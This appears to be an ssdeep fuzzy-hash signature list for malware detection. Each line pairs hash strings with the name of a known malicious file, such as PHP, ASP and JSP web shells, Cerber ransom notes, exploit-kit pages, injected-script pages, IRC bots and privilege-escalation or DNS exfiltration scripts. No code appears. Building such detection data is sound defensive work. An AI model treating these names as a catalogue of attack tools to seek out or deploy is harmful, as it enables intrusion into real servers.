+384:s4ykcJZ+l+7M7/gS2HIt/9dRecKDkH/mKjMHt4ulywBDcpzuVEfsTxQHwYWLxAdw:s4ykcJZ+l+7M7/gS2HIt/9dRecKDkH/M,"zorg6.php"
+384:s4y6fYLtpoCNEtUEL8Y8Q874w8iTV5bu2eZ7/qn:s4XfYhCCNDyVNYLbTV5bu2eZE,"pBot-rabot.php"
+384:S1trRx64XlTuAZopWyTtxAUoZhEd3Muxn4RP:S1ZdXlT1op3WQNxn49,"2016-06-26-Cerber-decryption-instructions.html"
+384:S1trRx64XlTuAZopW+9gUoZh7d3Muxn4RP:S1ZdXlT1opDCXNxn49,"2016-06-25-Cerber-decryption-instructions.html"
+384:rzQIMNl9mp5U2q6kQpC8NfH51rxszWtZ6iU47xUhlbSmV5i:rLcgpjTXszK6iU41olbSwi,"index.html.210"
+384:rzQ8j7IQ8j7VNlimp5U2q6kQ0lLA0Gbzon4fxox87vtX4JiWHUhlbS51XtwL6TdF:r8IlIJbpuR3WLyAwiuolbSTtwL6TVwto,"index.html.174"
+384:rZgzeKwgzeKfNlimp5U2q6kQkC8NHvAOm4xWtZHiWHUhlbSm05M:r+zeKlzeKfbpKTFPKHiuolbSDM,"index.html.126"
+384:ryjwKZjwKNNlimp5U2q6kQkC8NHvAOm4xWtZHiWHUhlbSme5i:rRK2KhbpKTFPKHiuolbSVi,"index.html.135"
+384:RyAy0wQJPtCjhOufy/J8mPoGdUpHdNkDBSCHY3AUrlrgLSHsq:wmwaCjhOuqh8JbpHdN0SV3FrlrsSf,"SymbOS.Lasco.zip"
+384:rXy7/Nl9mp5U2q6kQpC8NfH51rxszWtZ6i8HUhlbSmZ5N:rY/gpjTXszK6iYolbSYN,"index.html.219"
+384:rXtNl9mp5U2q6kQpC8NfH51rxszWtZ6i8HUhlbSjXtwL6UuT195Y:rXBgpjTXszK6iYolbSrtwL6USnY,"index.html.242"
+384:rxR1SBuNl9mp5U2q6kQpC8NfH51rxszWtZ6ipHUhlbSmJ50:rM6gpjTXszK6iFolbS00,"index.html.198"
+384:rxQt3Nl9mp5U2q6kQpC8NfH51rxszWtZ6i8HUhlbSmZ5K:rOXgpjTXszK6iYolbSYK,"index.html.233"
+384:rxd7r5RX6an7r5RX6a9ump5U2q6kQkC8NHvAOm4xWtZHiKxUhlbSmX5V:r35RXL35RXL5pKTFPKHiYolbSmV,"index.html.76"
+384:rWyNl9mp5U2q6kQpC8NfH51rxszWtZ6i8HUhlbSnt5a:rWWgpjTXszK6iYolbS3a,"index.html.109"
+384:RW+sLYA8PDZF2myBHkk2jDl0KMPHsMoNS:RBEmyBHfUl0tHnp,"x.php.1"
+384:rW+Nl9mp5U2q6kQpC8NfH51rxszWtZ6i8HUhlbSnt5i:rWKgpjTXszK6iYolbS3i,"index.html.248"
+384:rWKjC8mMjC8mqusp5U2q6kQvvpEycJv15jWsxEatf6RbiFHUhlbSm556:r7jC87jC89pxxQEEebi5olbSI6,"index.html.35"
+384:rWHsLYA8PDZF2myBHkk2jol0KMPHsMDXS:riEmyBHf3l0tHnW,"Thumbr.php.2"
+384:rWHsLYA8PDZF2myBHkk2jol0KMPHsMDlS:riEmyBHf3l0tHn8,"Thumbr.php.003"
+384:rWHsLYA8PDZF2myBHkk2jol0KMPHsMDkS:riEmyBHf3l0tHnB,"Thumbr.php.3"
+384:rWHsLYA8PDZF2myBHkk2jol0KMPHsMD8S:riEmyBHf3l0tHnx,"Thumbr.php.004"
+384:rWHsLYA8PDZF2myBHkk2jol0KMPHsMD6S:riEmyBHf3l0tHnf,"Thumbr.php.001"
+384:rWDsRNl9mp5U2q6kQpC8NfH51rxszWtZ6i8HUhlbSmV5P:rDtgpjTXszK6iYolbSwP,"index.html.213"
+384:rw55Wu6aR55Wu6a9Nlimp5U2q6kQkC8NHvAOm4xWtZHiWHUhlbSme5Z:r+5WuLL5WuLRbpKTFPKHiuolbStZ,"index.html.79"
+384:rvNl9mptU2q6kQpC8NfH51rxszWtZ6i8HUhlbSn85O:rvgpnTXszK6iYolbSYO,"index.html.278"
+384:rVJ5l6s5l6Yusprj2qU2q6kQkC8NHvAOm4xWtZHiWHUhlbSmtlb5/:rL5lt5l7pnqTFPKHiuolbSsd/,"index.html.44"
+384:rVdmpYEK9dmpYEKGNlimp5U2q6kQkC8NHvAOm4xWtZHiWHUhlbSmM5i:re6EKm6EKSbpKTFPKHiuolbSfi,"index.html.129"
+384:rurcm+Q0FP6kRvE+ExS5RvoPHOulBpeQO+2RVA:rCcm70FSkRvE1xS5loPHOulBpeQO4,"spexec.aspx.txt"
+384:ruANl9mp5U2q6kQpC8NfH51rxszWtZ6i8HUhlbSnt5u:ruogpjTXszK6iYolbS3u,"index.html.245"
+384:rUA8Nl9mp5U2q6kQpC8NfH51rxszWtZ6i8HUhlbSmZ5F:rBMgpjTXszK6iYolbSYF,"index.html.231"
+384:ru8r4C6mKr4C6mGusp5U2q6kQvvpEycJv15jWsxEatf6RbiFHUhlbSmZ5n:rH4C6b4C6FpxxQEEebi5olbS4n,"index.html.21"
+384:rTPzl3Z9tx+Z7NzVUTxOErxLioOTkXRVJIS3:rTbNXtx+Z7DUT4ErxLioOTkX3b,"SimAttacker_by_KingDefacer.v1.0.php.txt"
+384:rteNl9mp5U2q6kQpC8NfH51rxszWtZ6i8HUhlbSnf59:rtqgpjTXszK6iYolbSR9,"index.html.260"
+384:rT0NK7NK5Nlimp5U2q6kQkC8NHvAOm4xWtZHiWHUhlbSmc58:r+KhKVbpKTFPKHiuolbSH8,"index.html.162"
+384:rSYNl9mptU2q6kQpC8NfH51rxszWtZ6i8HUhlbSn85j:rSggpnTXszK6iYolbSYj,"index.html.266"
+384:rsYbNl9mp5U2q6kQpC8NfH51rxszWtZ6ipHUhlbSmV5v:rvDgpjTXszK6iFolbSwv,"index.html.207"
+384:rsm+mopNlimp5U2q6kQ0lLA0Gbzon4fxox87vtX4JiWHUhlbSmH5w:rp3oFbpuR3WLyAwiuolbSuw,"index.html.177"
+384:rSeCcmBCcmhusp5U2q6kQvvpEycJv15jWsxEatf6RbiFHUhlbSmZ5H:rRCcICcepxxQEEebi5olbS4H,"index.html.18"
+384:rs3wCymRwCymkusp5U2q6kQvvpEycJv15jWsxEatf6RbiFHUhlbSmZ5L:rnCypCyXpxxQEEebi5olbS4L,"index.html.15"
+384:rRNl9mptU2q6kQpC8NfH51rxszWtZ6i8HUhlbSn85Q:rtgpnTXszK6iYolbSYQ,"index.html.269"
+384:rRKNl9mp5U2q6kQpC8NfH51rxszWtZ6i8HUhlbSnt5/:rROgpjTXszK6iYolbS3/,"index.html.251"
+384:rRj8Nl9mp5U2q6kQpC8NfH51rxszWtZ6ipHUhlbSmV5L:rJMgpjTXszK6iFolbSwL,"index.html.201"
+384:rRj2r5Xx6sK2r5Xx6sOump5U2q6kQkC8NHvAOm4xWtZHiWHUhlbSmX5D:ro5XxJz5XxJ0pKTFPKHiuolbSmD,"index.html.73"
+384:RRfqoQvKxiw5XeYuyw5gmFNvHEr30tSEO4PE+/Q:HfqoQ2CS4PEN,"Invoke-MS16-032.ps1"
+384:rr9QFkNl9mp5U2q6kQpC8NfH51rxszWtZ6i0AxUhlbSmZ5z:rO0gpjTXszK6i0ColbSYz,"index.html.225"
+384:rr1QWmEDQWm0usp5U2q6kQgwc17FampOasx+1ltdVNbiFHUhlbSmC5n:rCWxkWhpiNK+1lfbi5olbSpn,"index.html.4"
+384:rqUH5S6aEUH5S6aVKNlimp5U2q6kQkC8NHvAOm4xWtZHiWHUhlbSm75m:r55SLL5SLwbpKTFPKHiuolbS6m,"index.html.92"
+384:rqFmNl9mp5U2q6kQpC8NfH51rxszWtZ6i0AxUhlbSmZ5I:ruygpjTXszK6i0ColbSYI,"index.html.222"
+384:rQbS7KMO7W6Fu+NUrciarGSkqcInPQZU/FFaUS/9xYqoEclQEJaC10UE5:rmMOC6FzU4b9QaF8USFkQC+X,"g00nshell-v1.3.php"
+384:rPf56x6aFf56x6atONlimp5U2q6kQkC8NHvAOm4xWtZHiWHUhlbSm75V:rX56xLV56xLgbpKTFPKHiuolbS6V,"index.html.85"
+384:ROt7aFQjOvvKvq7RjvzatqjdTkOEEbrJCxdxpTof:Rs+FvvCC7RjvtAof,"2016-02-15-page-from-waterfrontsouthgate.com.au-with-injected-script.txt"
+384:rOSnComUlnComEusp5U2q6kQgwc17FampOasx+1ltdVNbi6xUhlbSmC5O:rTCopVCoZpiNK+1lfbiIolbSpO,"index.html.1"
+384:rOgaj56acgaj56arYNlimp5U2q6kQkC8NHvAOm4xWtZHiWHUhlbSmy5rE:rOHj5LcHj5LUbpKTFPKHiuolbSFI,"index.html.105"
+384:rOfme556Lme5560usp5U2q6kQkC8NHvAOm4xWtZHiDxUhlbSm75X:ri55655hpKTFPKHidolbSOX,"index.html.50"
+384:rOF5T/06a+F5T/06aqNlimp5U2q6kQkC8NHvAOm4xWtZHiWHUhlbSm75E:rY5T/0LI5T/0LubpKTFPKHiuolbS6E,"index.html.88"
+384:roa50DP6aNa50DP6aqqNlimp5U2q6kQkC8NHvAOm4xWtZHiWHUhlbSm75O:rx5yPLg5yPLqubpKTFPKHiuolbS6O,"index.html.102"
+384:rNYuKKYYuKKTNlimp5U2q6kQ0lLA0Gbzon4fxox87vtX4JiyxUhlbSmc5p:rCK/K7bpuR3WLyAwigolbSHp,"index.html.168"
+384:rNyNl9mp5U2q6kQpC8NfH51rxszWtZ6i8HUhlbS7sXtwL6Uu7p5IW:rNWgpjTXszK6iYolbS7KtwL6U2R,"index.html.257"
+384:rNTw5j6sCw5j6sAump5U2q6kQkC8NHvAOm4xWtZHiWHUhlbSmX56:r65jJp5jJqpKTFPKHiuolbSm6,"index.html.63"
+384:rNqpqcNlimp5U2q6kQ0lLA0Gbzon4fxox87vtX4JiWHUhlbSmH5z:r0YsbpuR3WLyAwiuolbSuz,"index.html.186"
+384:rNd7Kvd7KoNlimp5U2q6kQkC8NHvAOm4xWtZHiWHUhlbSme5A:rD7K17KwbpKTFPKHiuolbSVA,"index.html.138"
+384:rn9tC3mptC3mVusp5U2q6kQvvpEycJv15jWsxEatf6RbiFHUhlbSm55Y:rTC3cC38pxxQEEebi5olbSIY,"index.html.29"
+384:rmnaClmHsaClm7usp5U2q6kQgwc17FampOasx+1ltdVNbiFHUhlbSmC5J:rxClozClIpiNK+1lfbi5olbSpJ,"index.html.12"
+384:Rm9b6qG3lyUlijJvcqeSi4dvGKECe4e0kiU0n3W2xOlN:8AlstXECZDFWFN,"20160201-150840-Vq7oWGjuZ1YAAA5P1H4AAAAM-file-0KPD17.1454303321_1"
+384:rKly7maCy7m6usp5U2q6kQgwc17FampOasx+1ltdVNbiFHUhlbSmC5j:rV75T7ppiNK+1lfbi5olbSpj,"index.html"
+384:r/KeA5e6x6A5e62usp5U2q6kQkC8NHvAOm4xWtZHiWHUhlbSm75F:r/5A5eC6A5e/pKTFPKHiuolbSOF,"index.html.53"
+384:rKD5P76a1D5P76aWUNlimp5U2q6kQkC8NHvAOm4xWtZHiWHUhlbSme5G:ry5DLh5DLfbpKTFPKHiuolbStG,"index.html.82"
+384:rjoW7RmvuW7RmTusp5U2q6kQgwc17FampOasx+1ltdVNbiFHUhlbSmC5G:rBRazRGpiNK+1lfbi5olbSpG,"index.html.7"
+384:rjmP3imP3pNlimp5U2q6kQkC8NHvAOm4xWtZHimZxUhlbSm055:r6P3xP3FbpKTFPKHiiolbSD5,"index.html.122"
+384:rJLrKCLrKNNlimp5U2q6kQkC8NHvAOm4xWtZHiWHUhlbSme50:rdrK0rKhbpKTFPKHiuolbSV0,"index.html.150"
+384:rjHyNl9mp5U2q6kQpC8NfH51rxszWtZ6i8HUhlbSn195F:rjWgpjTXszK6iYolbS1nF,"index.html.236"
+384:RJErQyGWe2gr3j+bUQQS948bW1YjaXGqwv6eG0af6GTAf:RJErQyGN2C3ibMiSYeXGqwv6eG0oDTAf,"spjspshell.jsp"
+384:rIwHyY1gNv8yiVnggmS2TgFnGjmufsnoC0WgS+i3UgMGMqm7iF:rnHyegJHmggZ28Fc8oGBM7iF,"CrystalShell_by_Mohajer22.v1.0.php.txt"
+384:riSQuNl9mp5U2q6kQpC8NfH51rxszWtZ6ipHUhlbSmJ5U:rG6gpjTXszK6iFolbS0U,"index.html.192"
+384:rims3Pms37Nlimp5U2q6kQkC8NHvAOm4xWtZHiWHUhlbSOxXtwL6Uuq05C:rxs3es3jbpKTFPKHiuolbSOFtwL6UuC,"index.html.119"
+384:rIK5O6W5O6Kusp5U2q6kQkC8NHvAOm4xWtZHiWHUhlbSm75P:rn5Ov5ORpKTFPKHiuolbSOP,"index.html.47"
+384:riAMNl9mp5U2q6kQpC8NfH51rxszWtZ6i8HUhlbSeXtwL6UuT195G:rPcgpjTXszK6iYolbSAtwL6USnG,"index.html.239"
+384:ri45t6QN5t6uusp5U2q6kQkC8NHvAOm4xWtZHiWHUhlbSm75t:rN5t/5tbpKTFPKHiuolbSOt,"index.html.56"
+384:r+GJNGJ7Nlimp5U2q6kQpC8NfH51rxszWtZ6ipHUhlbSmH590:r/AjbpjTXszK6iFolbSu90,"index.html.189"
+384:rg+5gme5gm2usp5U2q6kQkC8NHvAOm4xWtZHiWHUhlbSmR285g:rT5gt5g3pKTFPKHiuolbS0g,"index.html.38"
+384:rfxE576uaVE576uYump5U2q6kQkC8NHvAOm4xWtZHiWHUhlbSmX5O:r6573Z573SpKTFPKHiuolbSmO,"index.html.66"
+384:rFNl9mptU2q6kQpC8NfH51rxszWtZ6i8HUhlbSnX5x:r5gpnTXszK6iYolbSJx,"index.html.275"
+384:rfm5U6fO5U6fVump5U2q6kQkC8NHvAOm4xWtZHiWHUhlbSmX5X:r+5UCO5UCBpKTFPKHiuolbSmX,"index.html.59"
+384:rFKSKUKSKDNlimp5U2q6kQkC8NHvAOm4xWtZHiWHUhlbSmc5m:r1KcKrbpKTFPKHiuolbSHm,"index.html.156"
+384:rFK7pQKe7pQK/UNlimp5U2q6kQkC8NHvAOm4xWtZHiWHUhlbSmc5J:rFKiKeiK/kbpKTFPKHiuolbSHJ,"index.html.165"
+384:rfjitKrjitKKNlimp5U2q6kQkC8NHvAOm4xWtZHiWHUhlbSme5K:rf4Kr4KObpKTFPKHiuolbSVK,"index.html.147"
+384:rEDNl9mp5U2q6kQpC8NfH51rxszWtZ6i8HUhlbSnf5s:rErgpjTXszK6iYolbSRs,"index.html.263"
+384:rEaM3IaM3KNlimp5U2q6kQkC8NHvAOm4xWtZHiWHUhlbSmy5j:rLM3fM3ObpKTFPKHiuolbSFj,"index.html.112"
+384:rE2HWuCQmbHWuCQmjusp5U2q6kQvvpEycJv15jWsxEatf6RbiFHUhlbSm55V:rJWuCQAWuCQApxxQEEebi5olbSIV,"index.html.10"
+384:rDSn566asqn566ayump5U2q6kQkC8NHvAOm4xWtZHiWHUhlbSmX5L:re56LL56LopKTFPKHiuolbSmL,"index.html.69"
+384:r+DnK8DnKsNlimp5U2q6kQkC8NHvAOm4xWtZHiWHUhlbSmM5r:rYnKOnK8bpKTFPKHiuolbSfr,"index.html.132"
+384:rdMoe0Nl9mp5U2q6kQpC8NfH51rxszWtZ6i8HUhlbSmZ5P:r3JgpjTXszK6iYolbSYP,"index.html.216"
+384:rdcVNl9mp5U2q6kQpC8NfH51rxszWtZ6i0AxUhlbSmZ5z:rWJgpjTXszK6i0ColbSYz,"index.html.228"
+384:rccm8qKgm8qKBNlimp5U2q6kQkC8NHvAOm4xWtZHiWHUhlbSme5/:rTqKOqKdbpKTFPKHiuolbSV/,"index.html.141"
+384:rCacj7Hacj7HNlimp5U2q6kQ0lLA0Gbzon4fxox87vtX4JiWHUhlbSYXtwL6Uuh9:r8hnbpuR3WLyAwiuolbSOtwL6Uva,"index.html.171"
+384:rbz5nd66Y5nd6husp5U2q6kQkC8NHvAOm4xWtZHiWHUhlbSm75x:rv5nd9Y5ndSpKTFPKHiuolbSOx,"index.html.41"
+384:rBO9KOO9K5Nlimp5U2q6kQkC8NHvAOm4xWtZHiWHUhlbSmc5W:rqKdKVbpKTFPKHiuolbSHW,"index.html.159"
+384:rb7mOv3o7mOv3FNlimp5U2q6kQkC8NHvAOm4xWtZHiWHUhlbSKXtwL6Uup05a:rbCOv3oCOv35bpKTFPKHiuolbSEtwL6F,"index.html.116"
+384:rahMC/mhMC/mkusp5U2q6kQvvpEycJv15jWsxEatf6RbiFHUhlbSm55z:r5C/LC/jpxxQEEebi5olbSIz,"index.html.32"
+384:ragW3K/gW3KBNlimp5U2q6kQkC8NHvAOm4xWtZHiWHUhlbSuXtwL6Uuepc5Z:rSKtKdbpKTFPKHiuolbSQtwL6UjiZ,"index.html.153"
+384:r9a5p5i6aZa5p5i6aozNlimp5U2q6kQkC8NHvAOm4xWtZHiWHUhlbSaXtwL6UuV+:rM5PiL45PiLObpKTFPKHiuolbSUtwL6y,"index.html.98"
+384:r8Zla196a+Zla196aUNlimp5U2q6kQkC8NHvAOm4xWtZHiWHUhlbSWXtwL6UuY7V:rJ19L719LkbpKTFPKHiuolbSItwL6UZ/,"index.html.27"
+384:r8J8ilL6vg5t+0lmhCjvjnZASTbB3tVwUa3iwgMmTqp+VkrR2H9jXcV4yZnf6jJY:rieQ+cnlbd04yGbqszWj,"aspx经典大马.aspx"
+384:r6YFNl9mp5U2q6kQpC8NfH51rxszWtZ6ipHUhlbSmV5s:rx5gpjTXszK6iFolbSws,"index.html.204"
+384:r6NjMOK3NjMOKFNlimp5U2q6kQkC8NHvAOm4xWtZHiWHUhlbSD1XtwL6TdbOXtwG:rktKdtK5bpKTFPKHiuolbSltwL6TVwtt,"index.html.144"
+384:r/6kxb6kx/Nlimp5U2q6kQ0lLA0Gbzon4fxox87vtX4JiWHUhlbSmH5M:r7x/x/bpuR3WLyAwiuolbSuM,"index.html.180"
+384:r3/HwXomLpHwXomHusp5U2q6kQgwc17FampOasx+1ltdVNbiFHUhlbSmC5U:roXoWyXoipiNK+1lfbi5olbSpU,"index.html.3"
+384:r2Nl9mptU2q6kQpC8NfH51rxszWtZ6i8HUhlbSnX5L:rCgpnTXszK6iYolbSJL,"index.html.272"
+384:r2GXgNl9mp5U2q6kQpC8NfH51rxszWtZ6ipHUhlbSmJ5F:r5IgpjTXszK6iFolbS0F,"index.html.195"
+384:r2fC2mvC2mQusp5U2q6kQvvpEycJv15jWsxEatf6RbiFHUhlbSm55J:rQC2eC2HpxxQEEebi5olbSIJ,"index.html.22"
+384:r1xPn5Hy6auxPn5Hy6atNlimp5U2q6kQkC8NHvAOm4xWtZHiWHUhlbSm75y:r1pn5HyLupn5HyLBbpKTFPKHiuolbS6y,"index.html.95"
+384:r10EwSQd7IrUheG6FkZdTb1/OwTu2ctkKrd7CnRu5csqc8:r10tdAUheG6WZdTZ/OwT7WkKrd7CRTs0,"2016-06-20-page-from-salentoeasy.it-with-injected-pseudoDarkleech-script.txt"
+384:r06QW6Q2Nlimp5U2q6kQ0lLA0Gbzon4fxox87vtX4JiWHUhlbSmH56:rYGCbpuR3WLyAwiuolbSu6,"index.html.183"
+384:qZQ56q71F3z38FvKXQLNHMY2Ec/tykxGUC4rgNtCbhnIt9fRZj7SjtobgxzIe:qP2QLd2ENkTgqItzZj7mobKce,"hok.js.download"
+384:qyweB4dh7Epsdo04mygrp8cmavNWwD/Aj/GQaQo7RQV4OuD5KIu6misMwdO7v1yf:qeB4d1GMEgrh/w/wrDJJlTlxlY,"Nightrunner.aspx%20.txt"
+384:QXrZcRT7bYEWyyw7OqkjK23EpeWi5NiaEOXLifJQinx:Em7bYJw3wEpCiaJ7mJQ6x,"2016-05-31-KaiXin-EK-flash-exploit-3.swf"
+384:QT1afAi8ixGnA5jfGskvObhJiuJhYE74zxw4f+4sOXEPlA8rTEqXwQT0GRc/jAOr:Q6D8Zi7GfObhJVJhLM9z+4smlqAkX2/H,"thunb_shellbim.jpg.1"
+384:qSOdiP23UhzrkL2zlnSQdL6PUC4i+wC3pxdsW:+L3ErkL2RSQdL6n495pxdsW,"FW 71D65219CBE0BD8.msg"
+384:QQ/KxN4jvv3kbsIc+q+3+acqZcMF2VUjd:QQSxajv8bsIc+q+3+acqZcMF2VUjd,"ngh.php.php.txt"
+384:q+P862JkNUylFaXQ37qzMc8Hge4/JM4sy9/B+57pz:3866kNmXQ37dHo/axJ,"cowboy-irc-bot.pl"
+384:QmDoEBNvBprSEhuMH+hAFIRl61kW/IdbGUovbf23jyoFulBp1INA:FBNvBVhdHlFID6Vwdbgb7oQr,"2016-06-02-98.126.83.188-port-82-index.html.txt"
+384:qLLA0/e4QuQrsmEWLjdcq3Hnfl41L5Yda:qo024xQrsSI,"2016-07-28-page-from-orthopet.net-with-injected-script-third-run.txt"
+384:Qjj//HLUuWHsLYA8PDZF2myBHkk2jDl0KMPHsMDkS:WiEmyBHfUl0tHnB,"Thumbr.php.2.004"
+384:q88UvTSt2SM/mjpr3qMgjpVByoSv5OWz2oizt7y7JjXOXN2RMr1wP:qlUvmt1M/mjVqMgjpVByoSxOWz2oiztE,"2016-05-23-page-from-oakfarmsdairy.com-with-injected-pseudoDarkleech-script-first-run.txt"
+384:q5gAqAB05KwrLtAyeYmFXkG9VxZe4ZYfw325tu:EgyaKwrLZmFUETYj5tu,"2016-07-29-Magnitude-EK-more-HTML-first-run.txt"
+384:Q/54vtc46/lWlUSyL1U3z9kq4yLpdCz1SHyCLKX2coZfLjIPfWmGXUMEiD90:QTY9GU3z954ytkJSS0KX2coAvGbe,"warn.jsp"
+384:q1fph3hZAnqLRJ6vjx8h9EDokJ2yUqlLLOSYzfonHcRjmaaE8Ogfd6DaUk2RFwMj:GfhZASp/kOgfdEFwkXVjT5,"thumb.png"
+384:pxMotTJ6rkMWwbmIL9upcAiwYRtrwwzmIL9Kpg1rZuj1Y:pxMotTJ6rkMWwd9upcAiwYRtrww19Kp0,"mage-cdn.link.js"
+384:pxMotTJ6rkMWwbmIL9upcAiwYRtrwwzmIL9Kpg1P:pxMotTJ6rkMWwd9upcAiwYRtrww19Kpa,"ob2.js"
+384:Px+CjAq/90CabmN1OYce9Xb5SvlS20/Fm9jN2cZ75GFB5vA1STQb:pLB1OYce9XbMvlSJ6N2cDGFB5vA1STQb,"cms.config.checker.phps"
+384:PWEDBKM0P5Mm8Y/vw7a7NS+CEAVyhhJp98g/YLe:PWEDBKM0P5Mm8Y/vw7a7NSNEAVyhhJv9,"jsp_custom_spy_for_mysql.jsp"
+384:Pvpkw6+N9bqz1hx1zBH/h30HXa6PLzNJt/tG4Rvp0E04gii/:e/+0hxXfhkHquLbt1dE4gD/,"9955fc09f1633fbb24d5e1b3dd03551d_php.txt.orig.001"
+384:PpLF2Gf6TG91QDfwJMPaedka+5rkAD6v09GXwWQwtejr2PH:PFF2KeDflkl+Q6,"NTFS_FileRecord.h"
+384:PNQclkY/llVCeZ7c50G2yKawZp7Civg4ak+4RV:VrlkGlVc506Ipvg4aR4RV,"2016-06-30-page-from-marketingguerilla.es-with-injected-script-pointing-to-Afraidgate-domain.txt"
+384:pMpxQQNISQ68QI0Q0iQ2HpwqDpstfedIbKGJQLMDP:pmWQWd6DI70thqDp5L0z,"x.php.9"
+384:pLaLCITTVb2JylO+BGXmVfBGXwivOTk+Hkplk:peBpbmV+LVfoOTkGkA,"Small Web Shell by ZaCo.php"
+384:PKssoDpwL6ab+kDRKVZ+JvDDWUxDrjn01xbYEtEXxV:b0VDH01xMEtEXxV,"DNS_TXT_Pwnage.ps1"
+384:PJpN8taixOzeMIinmZT98UDqUbWECiCOamSJTXU2ssEEjM00id8a8jKU9l/DnzEg:PR8tai+mc/FE2sbLa8j3l/DnZdNib4,"Toolinclude.asp"
+384:phj4WyLwQIwWR5tHcHbHHihPlivBqHaF6rHqHvp5UU0fVBitX8Ji5yg4NV0GIU:phcLwQIwWqihPY4ey3Ooh,"ololo.cfm"
+384:pfWIuKBlqJRchJavFiHpURazoNAO9FHXELcd5IRKIb:AIuKBukavEpb0NAGF3um5I9b,"2016-06-21-EITest-flash-redirect-from-dertyt.ml.swf"
+384:pcQu31gvCUs3m3GwGTxmcAiuZ9GRseed+dFNbzpUl0iaZXo:pil+sW2wGTb1uZ9GSeDNbzpuU9o,"eligiblebombshell_1.2.0.1.py"
+384:pAzzCKINza4pr/efXuEeRwA/c0DwXYHtJ9obC69q6V5euvqD9kQ5TT4z9y:GzExa4prGfXFaD8IHtJ9mCWF0ufQ54zI,"mod_imagestyle.php"
+384:oxHY+sN3E1jhsJ6nlwyjUrKN7kRIPey5Bw5yTTh6ZuiI3w4FTwUoSEBrhUHVpU:oNrsi9hsYlwyjoKFCxSTSIfEgVpU,"stres.php"
+384:oxHY+sN3E1jhsJ6nlwyjUrKN7kRIPey5Bw5yTTh6ZuiI3w4FTwUoSEBrhUHVpPI+:oNrsi9hsYlwyjoKFCxSTSIfEgVpZ,"stres.txt"
+384:OWHsLYA8PDZF2myBHkk2jDl0KMPHsMDkS:OiEmyBHfUl0tHnB,"Thumbr.php.2.001"
+384:Ove0XOppLotIYPWtq8fk5jRFbwrovmy8yqfLYs+VwjKSFsi2bfi/Cbtb9ExbOM4w:Ove0XemrGq86cr4m9yULYjwhFslAIh9O,"VirusShare_e296374bd9b7df898131cfaa99c6e1f9"
+384:oU/54vtc46/lWPUSjL1U3zvU4uCz1SHyCLKX2i5IoZfLjURfk3mJUPAiD9k:oUTk9FU3zvU4zJSS0KX2iGoovM+,"shell.jsp"
+384:oU3/kdckgXH2qQW/Vlg4yDaYrHD6VUcQL5nxy/OdBTSMINRtxrgZMZ4Dr+LZLCHA:oUPkdc0Y/k4yDhj6VUcC5MgINtgMZhR,"mysqldump.tpl"
+384:Orx+aP2zBDLb8T5636oG29MPcsO4JrPb4O8b9uEzfV:+ohzB78M36oZ9MPcsxJjSpuC,"phpjackal1.3.zip"
+384:ORAqX8sTVfPd5A3O8qiV3O8qFGhU7bHpzakCvZpGYCc:ORAqX8shfF5A3O8qe3O8qsWHpzakCvZv,"good_1.asp"
+384:oOQ6qKfUe4fWjKVtbLlrhr9bRLh/s76B2WxLggD9209WUpUnRq:oOQ6qKgOKVbYg2WxLfDoq6c,"mdb.asp"
+384:OkHgeq1tXIAB5RNn/8tdkdlLv9GqjmoSGesaACobSLA93+WRG2pu:OkHq1h7NnEHgvsq6aeVACobSLy+Wxpu,"GFS web-shell ver 3.1.7 - PRiV8.txt.001"
+384:oiTdOXK0qIhriTdOXK0qI90SFC6bs5XuFaiq3LlYnOyO8Rewl69l7:269IN69IlC6bsRuFPq3LLx7,"2016-03-11-page-from-fixwindowsproblems.com-with-injected-script.txt"
+384:Ohv5g95zyGz48OnzE4T8my0iBAR641poyO0pdfIfJpAU7mr79O:UB6PzuovBUzpdf8JpV8O,"aspSH_by_Berend-Jan_SkyLined_Wever.v1.asp.txt"
+384:o/+gzTs1iQAuZkU/OpCgXS3VlqVZtqWtqLxqJU4ICHxaFiMhzwrPYVf/0VMFNX:o/1byphUL22MjX,"AlpHaNiX.SQLi.v2.0.txt"
+384:+oeNgSQRc2TxuiRhkTF3xqGB+umskfaEO3fe2B0:7pgiRhkVsGfmskfO3feb,"dns.txt"
+384:OBsM5vhTOWCXo+SgRsnyhYdHFh3Lxb4/EqZ4wlBhxDFOmU0//lk6jYUmwtsZh:lM5hTOWC48RsnymdHnLyD4aBHDVUr6Bs,"32243.2677.php"
+384:O4ykcJZ+l+7M7/gS2HIt/9dRecKDkH/mKjMHt4ulywBDcpzuVEfsTxQHwYWhxAdE:O4ykcJZ+l+7M7/gS2HIt/9dRecKDkH/2,"79092e8907d9889c9e53ce1913675cb1_php.txt"
+384:NYL62OMLZrIMngt6gqmGIAV5LqfF8TbqY:NY+2OM1kMnxxmGIAVYfF8r,"recky.jpg??"
+384:N+Xg83qasBxx0qvHsjg34xfBklnCknyWA:NS3aadqfOg34xfBkln0f,"kolang-bypass.txt"
+384:nuBiNnZL3hbKpb13PNlaVNLidBCYwn+1LDpi//4JAVqg1f/T63S0ZWkbueJPaFMM:nFNnlhWfNlogB8wL0//JVh6CGfyFM0x,"rO72tK0LK0e1"
+384:Ni/aeyOUTsgRgPJriHFMWTzJZjfD/h2M5lij942ladKBJG1wAQH7MQHDQYQHB:NsaeyOUkJriHFMWTzJZTrEM5lij942aP,"kerang.php"
+384:nG84q5LZmkyPdytTdERaxiuuwzlmmwoo7FzMsPln3L3CHiD9nBSTaFNYz:rv59mkyeERaxiuBlxbo7F4shDznqaFNa,"2016-03-02-page-from-kiwitemplates.com-with-pseudo-darkleech-script.txt"
+384:N8Orj+6R2L99L5uWw+nV5l8qak9dzFmvCwb1VMybBCZ0v2/e1ZIePIbLlaS:N8OGy23L5X+kmvnzbAB/epCLlB,"2016-07-20-page-from-classical959.com-with-injected-EITest-script.txt"
+384:N8J8ilL6vg5t+0lmhCjvjnZASTbB3tVwUa3iwgMOTqp+VkrR2H9jXcV4yZnf6jJE:NieQ+cnXbd04yGbqPzWc,"aspxspy.aspx"
+384:n0ZDTLaukPaOYscjQhcQixBn81EPcBehE8QYjLaNA9me:ADnk1YrBQG21EPDHzR,"48b5922e02a28233872fb35c22740538_php.txt"
+384:mYmauLp8ILB65SjHAS7/UsKh4h1bMLzGm/ojPIQp3izRmbeW9zG7AYBK:CauGaB65SjgS7/7Km12zGdIoyw9GcYBK,"lskdjflksjdflkjsdlkjf.txt"
+384:MUp6B81OK5fLNZMnqtn7ppLTxFaxrm+/BV+xEtl4Y7Q68uxRdcX2/3rM4cY:MTq11NZjNRTexS+3MYs68uxRC2PrlcY,"PHPRemoteView.php"
